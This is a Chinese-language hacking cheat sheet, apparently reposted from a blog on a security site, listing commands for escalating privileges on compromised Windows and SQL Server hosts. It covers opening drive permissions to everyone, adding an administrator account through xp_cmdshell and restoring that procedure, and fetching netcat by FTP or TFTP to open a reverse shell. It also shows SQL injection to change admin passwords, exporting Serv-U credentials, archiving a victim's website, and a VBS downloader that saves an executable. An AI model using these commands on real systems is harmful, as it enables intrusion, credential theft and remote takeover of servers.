首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
提權整理貼
来源:0day's Blog 作者:0day 发布时间:2008-09-11  

來源:0day's Blog
y-2k 的
許可權設置
cacls.exe c: /e /t /g everyone:F #把c盤設置為everyone可以流覽
cacls.exe d: /e /t /g everyone:F #把d盤設置為everyone可以流覽
cacls.exe e: /e /t /g everyone:F #把e盤設置為everyone可以流覽
cacls.exe f: /e /t /g everyone:F #把f盤設置為everyone可以流覽
cacls d:\website /g everyone /e /t授與完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系統使用者
exec master.dbo.xp_cmdshell 'net user admin admin /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'
恢復擴散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
如果恢復不了的解釋:
因為管理員是直接刪除dll檔,而沒刪除存儲過程,你這樣恢復肯定是提示存儲過程已存在了。你要先刪除存儲過程,use master
EXEC sp_dropextendedproc 'xp_cmdshell'
然後上傳xplog70.dll到某個目錄,例如C盤根目錄,然後執行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存儲過程執行系統指令了。
MB的沒想到閘道都能用NB這樣設..落伍啦.落伍啦
把他設置成閘道看看行不行.在NBSI執行命令那裡輸入:echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
這樣就把閘道設置為10.90.90.14了,然後我們ipconfig看看是不是有閘道了,
echo interface ip >1.txt
echo set address "本地連接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt
address"本地連接的名稱" 可以用ipconfig得到. static IP地址 子網路遮罩閘道地址。
好了現在我PING下163看看能不能PING通,如圖8
命令列FTP下載檔案
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt
NC做反彈SHELL
在本地監聽1234埠 nc -vv -l -p 1234
然後在NBSI執行命令那裡nc -e cmd.exe ip 1234
改密碼地
http://注入網址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]
查看系統線上使用者
query user
註銷用戶
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把網站打包到zhu.rar裡,
參數說明:
a 添加文件到壓縮檔中
-k 鎖定壓縮檔
-s產生固體存檔,這樣可以增大壓縮比
-r包括子目錄
-m1 設置壓縮比
-m0 存儲 添加到壓縮檔時不壓縮檔。
-m1 最快 使用最快方式(低壓縮)
-m2 較快 使用快速壓縮方式
-m3 標準 使用標準(預設)壓縮方式
-m4 較好 使用較好壓縮方式(較好壓縮,但是慢)
-m5 最好 使用最大壓縮方式(最好的壓縮,但是最慢
直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一樣
exec xp_cmdshell 'echo 內容 >>絕對路徑'
sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled
導SERV-U用戶.和密碼,不過現在版本密碼加密了``
regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"
導入是regedit /s xx.reg
埠:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
tftp -i serverip get xx.exe
TFTP –I 127.0.0.1 get common.dll c:\common.dll
VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下載檔案的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2
VPN
關防火和Application Layer Gateway Service
3389登陸
mstsc /console /v:IP:終端埠


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·渗透某知名游戏代理商内网全程
·从CSDN 漏洞谈.NET 安全开发
·教你两句话 动网8.20的后台被拿
·dfcms后台拿webshell,只谈思路
·拿下DVBBS php官网
·经过中国黑客鉴定,中国乳业网站
·hzhost虚拟主机系统致命漏洞
·饶过Xplog70.dll玩入侵
·又一个猥琐的技巧:Surf Jacking
·通过mysql对淮北生活通网站的一
·跨站脚本漏洞导致的浏览器劫持攻
·OmniPeek抓包的一点看法
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved